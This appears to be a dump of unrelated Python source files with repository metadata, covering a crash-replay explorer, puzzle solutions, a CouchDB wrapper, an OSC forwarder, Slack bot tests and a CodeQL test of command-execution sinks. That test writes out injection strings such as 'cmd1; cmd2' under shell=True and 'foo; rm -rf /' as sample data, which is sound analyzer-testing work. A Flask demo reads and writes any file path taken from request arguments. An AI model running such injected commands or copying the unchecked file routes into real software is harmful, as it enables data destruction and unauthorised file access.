if replay:
(base_path, dirnames,stdout_files) = get_replay_dirs(machines, base_name)
replayer.construct_crashed_dirs(dirnames, stdout_files)
MultiThreadedChecker.check_later(base_path, dirnames, stdout_files[machines[-1]], get_crash_point_id_string(crash_point))
count += 1
#if count == 1:
# print 'Done'
# MultiThreadedChecker.wait_and_get_outputs()
# return
if replay:
MultiThreadedChecker.wait_and_get_outputs()
replay_end = time.time()
print 'Prefix states : ' + str(count)
print 'Prefix replay took approx ' + str(replay_end-replay_start) + ' seconds...'
def replay_correlated_atomicity_prefix(replayer, interesting_prefix_states, client_index, rule_set, replay = True):
machines = replayer.conceptual_machines()
fs_ops = replayer.fs_ops_indexes()
server_machines = machines[:]
server_machines.remove(client_index)
server_count = len(server_machines)
assert server_count == 3
count = 0
replay_start = time.time()
replayer.set_environment(defaultfs('count', 3), defaultnet(), load_cross_deps = False)
apm_imposed_subset_machineset = apm_machines(rule_set)
for apm_imposed_machines in apm_imposed_subset_machineset:
for machine in machines:
replayer.load(machine, 0)
for crash_point in interesting_prefix_states:
atomic_ends = {}
atomic_currs = {}
machine = 0
for end_point in crash_point:
if machine in apm_imposed_machines:
atomic_ends[machine] = range(0, replayer.iops_len(machine, end_point))
atomic_currs[machine] = 0
machine += 1
atomic_end_list = []
while atleast_one_present(apm_imposed_machines, atomic_currs, atomic_ends):
atomic_end = {}
for machine in apm_imposed_machines:
if atomic_currs[machine] < len(atomic_ends[machine]):
atomic_end[machine] = atomic_ends[machine][atomic_currs[machine]]
else:
atomic_end[machine] = atomic_ends[machine][len(atomic_ends[machine])-1]
atomic_currs[machine] += 1
atomic_end_list.append(atomic_end)
for atomic_end in atomic_end_list:
for machine in server_machines:
if machine in apm_imposed_machines:
replayer.iops_end_at(machine, (crash_point[machine], atomic_end[machine]))
else:
replayer.iops_end_at(machine, (crash_point[machine], replayer.iops_len(machine, crash_point[machine]) - 1))
replayer.iops_end_at(client_index, (crash_point[client_index], replayer.iops_len(client_index, crash_point[client_index]) - 1))
base_name = replay_dir_base_name_AP(crash_point, atomic_end)
count += 1
if replay:
(base_path, dirnames,stdout_files) = get_replay_dirs(machines, base_name)
replayer.construct_crashed_dirs(dirnames, stdout_files)
MultiThreadedChecker.check_later(base_path, dirnames, stdout_files[machines[-1]], base_name)
#if count == 1:
# print 'Done'
# MultiThreadedChecker.wait_and_get_outputs()
# return
if replay:
MultiThreadedChecker.wait_and_get_outputs()
replay_end = time.time()
print 'Atomicity Prefix correlated states : ' + str(count)
print 'Atomicity Prefix correlated replay took approx ' + str(replay_end-replay_start) + ' seconds...'
def replay_correlated_reordering(replayer, interesting_prefix_states, client_index, rule_set, replay = True):
def end_highest_so_far(machine, curr_endpoint):
machine_dict = can_omit_for_machine_endpoint[machine]
maximum = -1
for key in machine_dict.keys():
if key > maximum and key <= curr_endpoint:
maximum = key
return maximum
machines = replayer.conceptual_machines()
fs_ops = replayer.fs_ops_indexes()
can_omit_ops = {}
can_omit_for_machine_endpoint = {}
server_machines = machines[:]
server_machines.remove(client_index)
server_count = len(server_machines)
assert server_count == 3
for machine in machines:
can_omit_ops[machine] = defaultdict(list)
for machine in machines:
can_omit_for_machine_endpoint[machine] = defaultdict(list)
replay_start = time.time()
for machine in machines:
replayer.load(machine, 0)
# Phase 1: See what all ops can be dropped for each end point in a machine
# For example, let's say the GRP is (x, y, z). For x in machine0, there can
# be multiple ops that are before x and can still be dropped when we end at x
# For example, consider the follwing:
# x-2: creat(file)
# x-1: write(foo)
# x : write(bar)
# In the above trace, it is legal to drop creat when the machine crashes at x.
# In this phase, we will find all such points that can be dropped for each x.
for crash_point in interesting_prefix_states:
for machine in machines:
replayer.iops_end_at(machine, (crash_point[machine], replayer.iops_len(machine, crash_point[machine]) - 1))
machine_id = 0
for end_point in crash_point:
can_end_highest = end_highest_so_far(machine_id, end_point)
if can_end_highest == -1:
omit_ops = [fs_op for fs_op in fs_ops[machine_id] if fs_op > -1 and fs_op < end_point]
else:
omit_ops1 = can_omit_for_machine_endpoint[machine_id][can_end_highest]
omit_ops2 = [fs_op for fs_op in fs_ops[machine_id] if fs_op >= can_end_highest and fs_op > -1 and fs_op < end_point]
omit_ops = omit_ops1 + omit_ops2
can_omit_temp = []
omit_ops_temp = []
for i in omit_ops:
replayer.mops_omit(machine_id, i)
if replayer.is_legal_reordering(machine_id):
can_omit_temp.append(i)
omit_ops_temp.append(i)
replayer.mops_include(machine_id, i)
can_omit_for_machine_endpoint[machine_id][end_point] = omit_ops_temp
can_omit_ops[machine_id][end_point] = can_omit_temp
machine_id += 1
# Phase 2: Using the points collected in phase 1, we can now see what points can be dropped across machines
# For example, for (x, y, z), if the drop dictionary looks like {x:[0, 2, 4], y:[1], z : [5, 7]}
# then we have 3*1*2 ways of dropping. Notice that we dont need to check if this is valid reordering
# It *has* to be valid state as the local drop points have been checked for this condition.
reordering_count = 0
apm_imposed_subset_machineset = apm_machines(rule_set)
for apm_imposed_machines in apm_imposed_subset_machineset:
for crash_point in interesting_prefix_states:
omittables = {}
for machine in machines:
replayer.iops_end_at(machine, (crash_point[machine], replayer.iops_len(machine, crash_point[machine]) - 1))
for machine in apm_imposed_machines:
if machine != client_index:
omittables[machine] = can_omit_ops[machine][crash_point[machine]]
for omit_pt in list(dict_value_product(omittables)):
to_omit_list = []
for mac in omit_pt.keys():
curr_omit = omit_pt[mac]
to_omit_list.append(replayer.micro_ops[mac][curr_omit])
if check_logically_same(to_omit_list):
reordering_count += 1
replayer.mops_omit_group(omit_pt)
base_name = replay_dir_base_name_RO(crash_point, omit_pt)
if replay:
(base_path, dirnames,stdout_files) = get_replay_dirs(machines, base_name)
replayer.construct_crashed_dirs(dirnames, stdout_files)
MultiThreadedChecker.check_later(base_path, dirnames, stdout_files[machines[-1]], base_name)
#if reordering_count == 1:
# print 'Done'
# MultiThreadedChecker.wait_and_get_outputs()
# return
replayer.mops_include_group(omit_pt)
del omittables
omittables = None
if replay:
MultiThreadedChecker.wait_and_get_outputs()
replay_end = time.time()
print 'Reordering correlated states : ' + str(reordering_count)
print 'Reordering correlated replay took approx ' + str(replay_end-replay_start) + ' seconds...'
def replay_correlated_atomicity_reordering(replayer, interesting_prefix_states, client_index, rule_set, replay = True):
machines = replayer.conceptual_machines()
fs_ops = replayer.fs_ops_indexes()
can_omit_ops = {}
server_machines = machines[:]
server_machines.remove(client_index)
server_count = len(server_machines)
assert server_count == 3
atomicity_reordering_count = 0
replay_start = time.time()
replayer.set_environment(defaultfs('count', 3), defaultnet(), load_cross_deps = False)
apm_imposed_subset_machineset = apm_machines(rule_set)
for machine in machines:
replayer.load(machine, 0)
for apm_imposed_machines in apm_imposed_subset_machineset:
for crash_point in interesting_prefix_states:
append_trunc_indexes = append_or_trunc_ops(replayer, server_machines, crash_point)
if any(append_trunc_indexes.values()):
# First, end all machine at the GRP point
machine = 0
for machine in machines:
replayer.iops_end_at(machine, (crash_point[machine], replayer.iops_len(machine, crash_point[machine]) - 1))
machine + 1
# Next we have to omit the sub (io or disk) ops as we call it
atomic_omits = {}
atomic_ro_currs = {}
machine = 0
for end_point in crash_point:
atomic_ro_currs[machine] = 0
if machine in apm_imposed_machines:
if append_trunc_indexes[machine]:
# If it is an append or trunc, break it into pieces and see for its absence
atomic_omits[machine] = range(0, replayer.iops_len(machine, end_point))
else:
# if not append, just put a marker. We will exclude this marker later
atomic_omits[machine] = [str(replayer.iops_len(machine, end_point)-1)]
machine +=1
atomic_omit_list = []
while atleast_one_present(apm_imposed_machines, atomic_ro_currs, atomic_omits):
atomic_omit = {}
for machine in apm_imposed_machines:
if atomic_ro_currs[machine] < len(atomic_omits[machine]):
atomic_omit[machine] = atomic_omits[machine][atomic_ro_currs[machine]]
else:
atomic_omit[machine] = None
atomic_ro_currs[machine] += 1
atomic_omit_list.append(atomic_omit)
for atomic_omit_x in atomic_omit_list:
atomic_omit = atomic_omit_x.copy()
base_name_prep = atomic_omit_x.copy()
for mac in apm_imposed_machines:
iop_index = atomic_omit[mac]
if type(iop_index) == str or iop_index == None:
del atomic_omit[mac]
else:
atomic_omit[mac] = (crash_point[mac], iop_index)
base_name_prep[mac] = (crash_point[mac], iop_index)
replayer.iops_omit_group(atomic_omit)
base_name = replay_dir_base_name_ARO(crash_point, base_name_prep)
atomicity_reordering_count += 1
if replay:
(base_path, dirnames,stdout_files) = get_replay_dirs(machines, base_name)
replayer.construct_crashed_dirs(dirnames, stdout_files)
MultiThreadedChecker.check_later(base_path, dirnames, stdout_files[machines[-1]], base_name)
#if atomicity_reordering_count == 1:
# print 'Done'
# MultiThreadedChecker.wait_and_get_outputs()
# return
replayer.iops_include_group(atomic_omit)
if replay:
MultiThreadedChecker.wait_and_get_outputs()
replay_end = time.time()
print 'Atomicity reordering correlated states : ' + str(atomicity_reordering_count)
print 'Atomicity reordering correlated replay took approx ' + str(replay_end-replay_start) + ' seconds...'
def check_corr_crash_vuls(pace_configs, sock_config, rule_set, threads = 1, replay = False):
print 'Parsing traces to determine logical operations ...'
#initialize the replayer
replayer = DSReplayer(pace_configs, sock_config)
#set the environment - what file system (defaultfs)? what network(defaultnet)?
replayer.set_environment(defaultfs('count', 1), defaultnet(), load_cross_deps = True)
#did we parse and understand? if yes, print.
replayer.print_ops(show_io_ops = True)
print 'Successfully parsed logical operations!'
if replay == False:
return
assert threads > 0
for i in range(0, threads):
t = MultiThreadedChecker(MultiThreadedChecker.queue, i)
t.setDaemon(True)
t.start()
(reachable_prefix_fsync_deps, reachable_prefix_no_deps) = compute_reachable_global_prefixes(replayer)
MultiThreadedChecker.reset()
replay_correlated_global_prefix(replayer, reachable_prefix_no_deps, True)
MultiThreadedChecker.reset()
replay_correlated_reordering(replayer, reachable_prefix_fsync_deps, replayer.client_index, rule_set, True)
MultiThreadedChecker.reset()
replay_correlated_atomicity_reordering(replayer, reachable_prefix_no_deps, replayer.client_index, rule_set, True)
MultiThreadedChecker.reset()
replay_correlated_atomicity_prefix(replayer, reachable_prefix_no_deps, replayer.client_index, rule_set, True)
uppath = lambda _path, n: os.sep.join(_path.split(os.sep)[:-n])
os.system('cp ' + os.path.join(uppath(paceconfig(0).cached_prefix_states_file, 1), 'micro_ops') + ' ' + paceconfig(0).scratchpad_dir)
|
ramanala/PACE
|
pacenonrsmexplorer.py
|
Python
|
mit
| 23,519
|
#!/usr/bin/env python3
import sys
import re
def extract(s):
return [int(x) for x in re.findall(r'(-?\d+).?', s)]
def fold_x(dot, x):
if dot[0] > x:
diff = dot[0] - x
return (x - diff, dot[1])
return dot
def main(args):
p1, p2 = sys.stdin.read().split("\n\n")
dots = [tuple(extract(l)) for l in p1.split("\n")]
instrs = p2.split("\n")
i1 = extract(instrs[0])[0]
# does assuming x always work??
new = {fold_x(dot, i1) for dot in dots}
print(len(new))
if __name__ == '__main__':
main(sys.argv)
|
msullivan/advent-of-code
|
2021/13a.py
|
Python
|
mit
| 559
|
from pymogilefs import backend, client, exceptions
# Set default logging handler to avoid "No handler found" warnings.
import logging
try: # Python 2.7+
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def emit(self, record):
pass
logging.getLogger(__name__).addHandler(NullHandler())
|
bwind/pymogilefs
|
pymogilefs/__init__.py
|
Python
|
mit
| 354
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def isSameTree(self, p, q):
"""
:type p: TreeNode
:type q: TreeNode
:rtype: bool
"""
if p is None and q is None:
return True
elif p is None and q:
return False
elif p and q is None:
return False
else:
return p.val == q.val and self.isSameTree(p.left, q.left) and self.isSameTree(p.right, q.right)
|
pineal/Leetcode_OJ
|
python/100_Same_Tree.py
|
Python
|
mit
| 615
|
from flask import Blueprint
from flask import render_template, jsonify, request, redirect, url_for
mod = Blueprint('demo1', __name__, )
@mod.route('/', methods=["GET", "POST"])
def index():
return redirect(url_for('demo1.editor'))
@mod.route('/editor', methods=["GET", "POST"])
def editor():
return render_template('demo1.html')
@mod.route('/fetch', methods=["GET", "POST"])
def fetch_file():
filepath = request.args.get('path')
if not filepath:
return "No path passed", 403
try:
content = open(filepath, "rb").read()
except:
return "Error reading file", 403
return jsonify(content=content)
@mod.route('/save', methods=["GET", "POST"])
def save_file():
filepath = request.args.get('path')
content = request.args.get('content')
if not filepath:
return "No path passed", 403
if not content:
return "No content passed", 403
try:
with open(filepath, "wb") as f:
f.write(content)
message = "File saved successfully"
except:
return "Error writing file", 403
return jsonify(content=message)
|
arpitbbhayani/editor-demo
|
app/views/demo1.py
|
Python
|
mit
| 1,134
|
import copy
import functools
from jsonobject import *
from couchdbkit import schema
from restkit import ResourceNotFound
from couchjock.proxy_dict import ProxyDict
SchemaProperty = ObjectProperty
SchemaListProperty = ListProperty
StringListProperty = functools.partial(ListProperty, unicode)
SchemaDictProperty = DictProperty
class DocumentSchema(JsonObject):
@StringProperty
def doc_type(self):
return self.__class__.__name__
@property
def _doc(self):
return ProxyDict(self, self._obj)
class DocumentBase(DocumentSchema):
_id = StringProperty()
_rev = StringProperty()
_attachments = DictProperty()
_db = None
def to_json(self):
doc = copy.copy(super(DocumentBase, self).to_json())
for special in ('_id', '_rev', '_attachments'):
if not doc[special]:
del doc[special]
return doc
# The rest of this class is mostly copied from couchdbkit 0.5.7
@classmethod
def set_db(cls, db):
cls._db = db
@classmethod
def get_db(cls):
db = cls._db
if db is None:
raise TypeError("doc database required to save document")
return db
def save(self, **params):
""" Save document in database.
@params db: couchdbkit.core.Database instance
"""
# self.validate()
db = self.get_db()
doc = self.to_json()
db.save_doc(doc, **params)
if '_id' in doc and '_rev' in doc:
self.update(doc)
elif '_id' in doc:
self.update({'_id': doc['_id']})
store = save
@classmethod
def save_docs(cls, docs, use_uuids=True, all_or_nothing=False):
""" Save multiple documents in database.
@params docs: list of couchdbkit.schema.Document instance
@param use_uuids: add _id in doc who don't have it already set.
@param all_or_nothing: In the case of a power failure, when the database
restarts either all the changes will have been saved or none of them.
However, it does not do conflict checking, so the documents will
be committed even if this creates conflicts.
"""
db = cls.get_db()
docs_to_save = [doc for doc in docs if doc._doc_type == cls._doc_type]
if not len(docs_to_save) == len(docs):
raise ValueError("one of your documents does not have the correct type")
db.bulk_save(docs_to_save, use_uuids=use_uuids, all_or_nothing=all_or_nothing)
bulk_save = save_docs
@classmethod
def get(cls, docid, rev=None, db=None, dynamic_properties=True):
""" get document with `docid`
"""
if not db:
db = cls.get_db()
cls._allow_dynamic_properties = dynamic_properties
return db.get(docid, rev=rev, wrapper=cls.wrap)
@classmethod
def get_or_create(cls, docid=None, db=None, dynamic_properties=True, **params):
""" get or create document with `docid` """
if db:
cls.set_db(db)
cls._allow_dynamic_properties = dynamic_properties
db = cls.get_db()
if docid is None:
obj = cls()
obj.save(**params)
return obj
rev = params.pop('rev', None)
try:
return db.get(docid, rev=rev, wrapper=cls.wrap, **params)
except ResourceNotFound:
obj = cls()
obj._id = docid
obj.save(**params)
return obj
new_document = property(lambda self: self._doc.get('_rev') is None)
def delete(self):
""" Delete document from the database.
@params db: couchdbkit.core.Database instance
"""
if self.new_document:
raise TypeError("the document is not saved")
db = self.get_db()
# delete doc
db.delete_doc(self._id)
# reinit document
del self._doc['_id']
del self._doc['_rev']
class Document(DocumentBase, schema.QueryMixin, schema.AttachmentMixin):
@property
def get_id(self):
return self._id
@property
def get_rev(self):
return self._rev
|
dannyroberts/couchjock
|
couchjock/__init__.py
|
Python
|
mit
| 4,152
|
# Note: Some of these commands will technically not allow an attacker to execute
# arbitrary system commands, but only specify the program to be executed. The general
# consensus was that even this is still a high security risk, so we also treat them as
# system command executions.
#
# As an example, executing `subprocess.Popen(["rm -rf /"])` will result in
# `FileNotFoundError: [Errno 2] No such file or directory: 'rm -rf /'`
########################################
import os
# can't use a string literal with spaces in the tags of an InlineExpectationsTest, so using variables :|
os.popen("cmd1; cmd2") # $getCommand="cmd1; cmd2"
os.system("cmd1; cmd2") # $getCommand="cmd1; cmd2"
def os_members():
# hmm, it's kinda annoying to check that we handle this import correctly for
# everything. It's quite useful since I messed it up initially and didn't have a
# test for it, but in the long run it's just cumbersome to duplicate all the tests
# :|
from os import popen, system
popen("cmd1; cmd2") # $getCommand="cmd1; cmd2"
system("cmd1; cmd2") # $getCommand="cmd1; cmd2"
########################################
# https://docs.python.org/3.8/library/os.html#os.execl
#
# VS Code extension will ignore rest of program if encountering one of these, which we
# don't want. We could use `if False`, but just to be 100% sure we don't do anything too
# clever in our analysis that discards that code, I used `if UNKNOWN` instead
#
# below, `path` is an relative/absolute path, for the `p` variants this could also be
# the name of a executable, which will be looked up in the PATH environment variable,
# which we call `file` to highlight this difference.
#
# These are also modeled as FileSystemAccess, although they are not super relevant for
# the path-injection query -- a user being able to control which program is executed
# doesn't sound safe even if that is restricted to be within a certain directory.
if UNKNOWN:
env = {"FOO": "foo"}
os.execl("path", "<progname>", "arg0") # $ getCommand="path" getAPathArgument="path"
os.execle("path", "<progname>", "arg0", env) # $ getCommand="path" getAPathArgument="path"
os.execlp("file", "<progname>", "arg0") # $ getCommand="file" getAPathArgument="file"
os.execlpe("file", "<progname>", "arg0", env) # $ getCommand="file" getAPathArgument="file"
os.execv("path", ["<progname>", "arg0"]) # $ getCommand="path" getAPathArgument="path"
os.execve("path", ["<progname>", "arg0"], env) # $ getCommand="path" getAPathArgument="path"
os.execvp("file", ["<progname>", "arg0"]) # $ getCommand="file" getAPathArgument="file"
os.execvpe("file", ["<progname>", "arg0"], env) # $ getCommand="file" getAPathArgument="file"
########################################
# https://docs.python.org/3.8/library/os.html#os.spawnl
env = {"FOO": "foo"}
os.spawnl(os.P_WAIT, "path", "<progname>", "arg0") # $ getCommand="path" getAPathArgument="path"
os.spawnle(os.P_WAIT, "path", "<progname>", "arg0", env) # $ getCommand="path" getAPathArgument="path"
os.spawnlp(os.P_WAIT, "file", "<progname>", "arg0") # $ getCommand="file" getAPathArgument="file"
os.spawnlpe(os.P_WAIT, "file", "<progname>", "arg0", env) # $ getCommand="file" getAPathArgument="file"
os.spawnv(os.P_WAIT, "path", ["<progname>", "arg0"]) # $ getCommand="path" getAPathArgument="path"
os.spawnve(os.P_WAIT, "path", ["<progname>", "arg0"], env) # $ getCommand="path" getAPathArgument="path"
os.spawnvp(os.P_WAIT, "file", ["<progname>", "arg0"]) # $ getCommand="file" getAPathArgument="file"
os.spawnvpe(os.P_WAIT, "file", ["<progname>", "arg0"], env) # $ getCommand="file" getAPathArgument="file"
# unlike os.exec*, some os.spawn* functions is usable with keyword arguments. However,
# despite the docs using both `file` and `path` as the parameter name, you actually need
# to use `file` in all cases.
os.spawnv(mode=os.P_WAIT, file="path", args=["<progname>", "arg0"]) # $ getCommand="path" getAPathArgument="path"
os.spawnve(mode=os.P_WAIT, file="path", args=["<progname>", "arg0"], env=env) # $ getCommand="path" getAPathArgument="path"
os.spawnvp(mode=os.P_WAIT, file="file", args=["<progname>", "arg0"]) # $ getCommand="file" getAPathArgument="file"
os.spawnvpe(mode=os.P_WAIT, file="file", args=["<progname>", "arg0"], env=env) # $ getCommand="file" getAPathArgument="file"
# `posix_spawn` Added in Python 3.8
os.posix_spawn("path", ["<progname>", "arg0"], env) # $ getCommand="path" getAPathArgument="path"
os.posix_spawn(path="path", argv=["<progname>", "arg0"], env=env) # $ getCommand="path" getAPathArgument="path"
os.posix_spawnp("path", ["<progname>", "arg0"], env) # $ getCommand="path" getAPathArgument="path"
os.posix_spawnp(path="path", argv=["<progname>", "arg0"], env=env) # $ getCommand="path" getAPathArgument="path"
########################################
import subprocess
subprocess.Popen("cmd1; cmd2", shell=True) # $getCommand="cmd1; cmd2"
subprocess.Popen("cmd1; cmd2", shell="truthy string") # $getCommand="cmd1; cmd2"
subprocess.Popen(["cmd1; cmd2", "shell-arg"], shell=True) # $getCommand="cmd1; cmd2"
subprocess.Popen("cmd1; cmd2", shell=True, executable="/bin/bash") # $getCommand="cmd1; cmd2" getCommand="/bin/bash"
subprocess.Popen("executable") # $getCommand="executable"
subprocess.Popen(["executable", "arg0"]) # $getCommand="executable"
subprocess.Popen("<progname>", executable="executable") # $getCommand="executable"
subprocess.Popen(["<progname>", "arg0"], executable="executable") # $getCommand="executable"
# call/check_call/check_output/run all work like Popen from a command execution point of view
subprocess.call(["executable", "arg0"]) # $getCommand="executable"
subprocess.check_call(["executable", "arg0"]) # $getCommand="executable"
subprocess.check_output(["executable", "arg0"]) # $getCommand="executable"
subprocess.run(["executable", "arg0"]) # $getCommand="executable"
########################################
# actively using known shell as the executable
subprocess.Popen(["/bin/sh", "-c", "vuln"]) # $getCommand="/bin/sh" MISSING: getCommand="vuln"
subprocess.Popen(["/bin/bash", "-c", "vuln"]) # $getCommand="/bin/bash" MISSING: getCommand="vuln"
subprocess.Popen(["/bin/dash", "-c", "vuln"]) # $getCommand="/bin/dash" MISSING: getCommand="vuln"
subprocess.Popen(["/bin/zsh", "-c", "vuln"]) # $getCommand="/bin/zsh" MISSING: getCommand="vuln"
subprocess.Popen(["sh", "-c", "vuln"]) # $getCommand="sh" MISSING: getCommand="vuln"
subprocess.Popen(["bash", "-c", "vuln"]) # $getCommand="bash" MISSING: getCommand="vuln"
subprocess.Popen(["dash", "-c", "vuln"]) # $getCommand="dash" MISSING: getCommand="vuln"
subprocess.Popen(["zsh", "-c", "vuln"]) # $getCommand="zsh" MISSING: getCommand="vuln"
# Check that we don't consider ANY argument a command injection sink
subprocess.Popen(["sh", "/bin/python"]) # $getCommand="sh"
subprocess.Popen(["cmd.exe", "/c", "vuln"]) # $getCommand="cmd.exe" MISSING: getCommand="vuln"
subprocess.Popen(["cmd.exe", "/C", "vuln"]) # $getCommand="cmd.exe" MISSING: getCommand="vuln"
subprocess.Popen(["cmd", "/c", "vuln"]) # $getCommand="cmd" MISSING: getCommand="vuln"
subprocess.Popen(["cmd", "/C", "vuln"]) # $getCommand="cmd" MISSING: getCommand="vuln"
subprocess.Popen(["<progname>", "-c", "vuln"], executable="/bin/bash") # $getCommand="/bin/bash" MISSING: getCommand="vuln"
if UNKNOWN:
os.execl("/bin/sh", "<progname>", "-c", "vuln") # $getCommand="/bin/sh" getAPathArgument="/bin/sh" MISSING: getCommand="vuln"
os.spawnl(os.P_WAIT, "/bin/sh", "<progname>", "-c", "vuln") # $getCommand="/bin/sh" getAPathArgument="/bin/sh" MISSING: getCommand="vuln"
########################################
# Passing arguments by reference
args = ["/bin/sh", "-c", "vuln"]
subprocess.Popen(args) # $getCommand=args
args = "<progname>"
use_shell = False
exe = "executable"
subprocess.Popen(args, shell=use_shell, executable=exe) # $getCommand=exe SPURIOUS: getCommand=args
################################################################################
# Taint related
import shlex
cmd = shlex.join(["echo", tainted])
args = shlex.split(tainted)
# will handle tainted = 'foo; rm -rf /'
safe_cmd = "ls {}".format(shlex.quote(tainted))
# not how you are supposed to use shlex.quote
wrong_use = shlex.quote("ls {}".format(tainted))
# still dangerous, for example
cmd = "sh -c " + wrong_use
|
github/codeql
|
python/ql/test/library-tests/frameworks/stdlib/SystemCommandExecution.py
|
Python
|
mit
| 8,427
|
from pythonosc import osc_server
from pythonosc import osc_packet
import threading
import socketserver
import socket
class SimpleUDPClient(object):
def __init__(self, address, port):
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._sock.setblocking(0)
self._address = address
self._port = port
def send(self, content):
self._sock.sendto(content, (self._address, self._port))
class UDPForwarderHandler(socketserver.BaseRequestHandler):
def handle(self):
data = self.request[0]
self.server.out.send(data)
try:
self.async_print(osc_packet.OscPacket(data))
except osc_packet.ParseError:
pass
def async_print(self, packet):
thread = threading.Thread(target=self.print, args=(packet, self.server.identifier))
thread.daemon = False
thread.start()
def print(self, packet, identifier):
for timed_msg in packet.messages:
vals = ", ".join(map(str, timed_msg.message))
self.server.vals[timed_msg.message.address] = vals
#print("[{0}] [{1}] -- {{{2}}}".format(identifier, timed_msg.message.address, vals))
class OSCUDPServerForwarder(socketserver.UDPServer):
def __init__(self, identifier, server_address, destination):
super().__init__(server_address, UDPForwarderHandler)
self.out = SimpleUDPClient(*destination)
self.identifier = identifier
self.vals = {}
def start(self):
self.thread = threading.Thread(target=self.serve_forever)
self.thread.daemon = True
self.thread.start()
|
philipbjorge/osc-spy
|
forwarder.py
|
Python
|
mit
| 1,519
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
from django.utils.encoding import python_2_unicode_compatible
from django.db import models
LOG = logging.getLogger(__name__)
@python_2_unicode_compatible
class IndexSpecification(models.Model):
project = models.ForeignKey('sunlumo_project.Project')
name = models.CharField(max_length=50)
layer = models.ForeignKey('sunlumo_project.Layer')
fields = models.ManyToManyField(
'sunlumo_project.Attribute', through='IndexAttribute',
through_fields=('index', 'attribute')
)
def __str__(self):
return '{}'.format(self.name)
@python_2_unicode_compatible
class IndexAttribute(models.Model):
attribute = models.ForeignKey('sunlumo_project.Attribute')
index = models.ForeignKey('IndexSpecification')
primary_key = models.BooleanField(default=False)
ordering = models.IntegerField(default=-1)
def __str__(self):
return '{} ({})'.format(self.index, self.attribute)
class IndexData(models.Model):
index = models.ForeignKey('IndexSpecification')
feature_id = models.TextField()
text = models.TextField()
class Meta:
index_together = [['index', 'feature_id']]
|
candela-it/sunlumo
|
django_project/sunlumo_similaritysearch/models.py
|
Python
|
mit
| 1,234
|
# MIT License
#
# Copyright (c) 2018 Matthew Bedder (matthew@bedder.co.uk)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
Tests for the ``GifBot`` class.
"""
import unittest
from unittest.mock import patch, MagicMock
from gif_bot.gif_bot import GifBot
api_collector = MagicMock()
def mock_api_call(command, *args, **kwargs):
if command == "users.list":
return {
"ok": True,
"members": [
{"name": "test_bot_name", "id": "test_bot_id"},
{"name": "test_owner_name", "id": "test_owner_id"}
]
}
else:
api_collector(command, *args, **kwargs)
def mock_client(_):
return MagicMock(api_call=mock_api_call)
def Any(cls):
class Any(cls):
def __eq__(self, other):
return True
return Any()
@patch("gif_bot.gif_bot.SlackClient", mock_client)
@patch("gif_bot.gif_bot.getLogger")
@patch("gif_bot.gif_bot.Formatter")
@patch("gif_bot.gif_bot.Logger")
@patch("gif_bot.gif_bot.RotatingFileHandler")
class TestGifBot(unittest.TestCase):
def setUp(self):
api_collector.reset_mock()
def test_is_mention(self, *args):
""" The bot should be able to identify direct mentions """
bot = GifBot("test.config", MagicMock())
self.assertTrue(bot.is_mention("@test_bot_name"))
self.assertTrue(bot.is_mention("@test_bot_name help"))
self.assertFalse(bot.is_mention("Something @test_bot_name"))
def test_is_trigger(self, *args):
""" The bot should be able to identify trigger words being used in messages """
bot = GifBot("test.config", MagicMock())
self.assertTrue(bot.is_trigger("test_trigger blah"))
self.assertTrue(bot.is_trigger("blah test_trigger"))
self.assertFalse(bot.is_trigger("something else"))
def test_not_trigger_non_message(self, *args):
""" The bot should ignore non-messages """
bot = GifBot("test.config", MagicMock())
bot.handle_message({
"channel": "test_channel",
"ts": "test_ts"
})
api_collector.assert_not_called()
def test_not_trigger_self(self, *args):
""" The bot shouldn't be able to trigger itself """
bot = GifBot("test.config", MagicMock())
bot.handle_message({
"user": "test_bot_id",
"text": "Something something test_trigger",
"channel": "test_channel",
"ts": "test_ts"
})
api_collector.assert_not_called()
def test_handle_trigger_message(self, *args):
""" The bot should trigger on messages from users containing a trigger word """
bot = GifBot("test.config", MagicMock())
bot.handle_message({
"user": "test_user_id",
"text": "Something something test_trigger",
"channel": "test_channel",
"ts": "test_ts"
})
api_collector.assert_any_call("chat.postMessage", text=Any(str),
channel="test_channel", as_user=True)
api_collector.assert_any_call("reactions.add", name="test_reaction",
channel="test_channel", timestamp="test_ts")
def test_handle_request_success(self, *args):
""" The bot should post a gif and a happy reaction when they can fulfill a request """
bot = GifBot("test.config", MagicMock())
bot.handle_message({
"user": "test_user_id",
"text": "@test_bot_name request tag_a1",
"channel": "test_channel",
"ts": "test_ts"
})
api_collector.assert_any_call("chat.postMessage", text=Any(str),
channel="test_channel", as_user=True)
api_collector.assert_any_call("reactions.add", name="test_reaction",
channel="test_channel", timestamp="test_ts")
def test_handle_request_failure(self, *args):
""" The bot should send a message and react with :brokenheart: when it cannot fulfill a
request """
bot = GifBot("test.config", MagicMock())
bot.handle_message({
"user": "test_user_id",
"text": "@test_bot_name request invalid_tag",
"channel": "test_channel",
"ts": "test_ts"
})
api_collector.assert_any_call("chat.postMessage", text=Any(str),
channel="test_channel", as_user=True)
api_collector.assert_any_call("reactions.add", name="broken_heart",
channel="test_channel", timestamp="test_ts")
def test_admin(self, *args):
""" Test that basic admin commands work """
bot = GifBot("test.config", MagicMock())
self.assertNotIn("tag", bot.store.tags)
self.assertEqual(len(bot.store.elements), 2)
bot.handle_message({
"user": "test_owner_id",
"text": "add url tag",
"channel": "Dtest_channel",
"ts": "test_ts"
})
